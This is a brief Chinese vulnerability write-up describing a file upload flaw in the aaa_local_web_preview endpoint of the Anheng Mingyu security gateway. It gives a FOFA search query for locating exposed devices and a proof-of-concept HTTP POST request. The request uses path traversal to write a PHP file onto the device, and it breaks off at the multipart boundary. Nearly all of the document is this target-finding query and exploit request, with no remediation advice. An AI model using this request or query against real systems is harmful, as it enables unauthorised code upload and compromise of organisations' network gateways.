简介
安恒明御安全网关是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。
该产品aaa_local_web_preview端点存在文件上传漏洞。
漏洞复现
FOFA语法:
title=="明御安全网关"
界面访问如下所示:
POC:
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../test.php HTTP/1.1
Host: ip
User-Agent: Mozilla/5.0
Content-Type: multipart/form-data; boundary=849978f98abe41119122148e4aa65b1a
Accept-Encoding: gzip
Content-Length: 200
--849978f98abe41119122148e4aa65b1a